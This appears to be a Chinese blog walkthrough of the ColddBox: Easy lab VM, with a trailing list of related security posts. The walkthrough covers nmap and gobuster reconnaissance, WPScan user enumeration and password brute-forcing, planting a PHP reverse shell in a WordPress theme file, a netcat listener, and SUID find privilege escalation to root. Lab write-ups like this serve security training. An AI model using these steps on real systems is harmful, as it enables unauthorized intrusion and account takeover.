ColddBox: Easy靶场渗透

将两台虚拟机网络连接都改为NAT模式

  1. 攻击机上做namp局域网扫描发现靶机

    nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.155

  1. 对靶机进行端口服务探测

    nmap -sV -T4 -p- -A 192.168.23.155

发现 4512 端口开放着 ssh 服务,可能是因为管理员为了安全将工作端口 22 改到了 4512

  1. 访问 80 端口开放的 web 服务

扫描网站子目录

复制代码
gobuster dir -u http://192.168.23.155 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403,400

根据网站目录结构判断网站是 wordpress CMS 建站的

  1. 在网站目录下发现隐藏信息

http://192.168.23.155/hidden/

紧急通知科尔德,你修改了雨果的密码,麻烦尽快把新密码发给他,这样他才能继续上传文章。菲利普

  1. 在使用专项扫描工具查找 wordpress 站点相关的系统薄弱点

    wpscan --url http://192.168.23.155

再扫描枚举网站账户名称

复制代码
 wpscan --url http://192.168.23.155/ --enumerate u 

得到四个用户名

the cold in person

philip

c0ldd

hugo

  1. 将上述内容写入密码本,然后使用大字典进行爆破

    mousepad user.txt
    wpscan --url http://192.168.23.155 -U user.txt -P /usr/share/wordlists/rockyou.txt

最后得到一对账户密码

c0ldd/9876543210

  1. 使用上述账密登录成功登录网站

在后台对wordpress 的主题进行编辑,在下述页面黏贴 kali 自带的反弹 shell 代码

http://192.168.23.155/wp-admin/theme-editor.php?file=404.php&theme=twentyfourteen&scrollto=72&updated=true

更新网站页面代码之后,访问 404.php 的网站页面触发反弹 shell

http://192.168.23.155/wp-content/themes/twentyfourteen/404.php

  1. 注意 kali 在触发反弹 shell 之前就需要监听 4444 端口以 getshell

    nc -lvvp 4444

成功 getshell,然后 php 启动一个可交互 shell

复制代码
php -r 'system("/bin/bash -i");'
  1. 信息收集一下

    id
    ls /home
    uname -a
    lsb_release -a

  1. 然后查看一下提权方法

    sudo -l
    find / -perm -u=s -type f 2>/dev/null

然后就是 find 命令提权

复制代码
cd /tmp
touch test
find test -exec whoami \;
find test -exec cat /root/root.txt \;

成功提权得到 flag,base64 解密一下 即可

相关推荐
xixingzhe27 小时前
SpringBoot + Nginx 免鉴权接口安全防护方案
运维·nginx·安全
中科岩创8 小时前
宁波某大学高支模施工安全监测实训模型应用
科技·物联网·安全·自动化
项目经理老王9 小时前
OpenClaw无捆绑安装包,安全纯净版AI助手部署
人工智能·安全
小李@Free2FA15 小时前
跨境卖家多平台二次验证统一管理
安全·外贸·2fa·二次验证
云祺vinchin16 小时前
混合云异构环境下的灾备实战:VMware+Hyper-V统一保护方案解析
安全·容灾备份·容灾备份体系
MartinYeung516 小时前
从注入攻击到诈骗:@martin_yeung/llm-up-guardrail 提供生产级 AI 安全防护
人工智能·安全
chengbei1217 小时前
SoloXSS:一款现代化的自托管 XSS平台
web安全·xss漏洞·xss平台
anbingsoft1217 小时前
企业加密软件软件有哪些?企业加密软件:让设计图纸安全无忧,年度热销
网络·安全·电脑
一楼的猫19 小时前
AI写作检测机制技术深度解析:200+维度检测、叙事指纹与网文AI辅助怎么过审
人工智能·学习·安全·chatgpt·ai写作
技术不好的崎鸣同学19 小时前
[极客大挑战 2019]EasySQL 思路及解法
网络·安全·web安全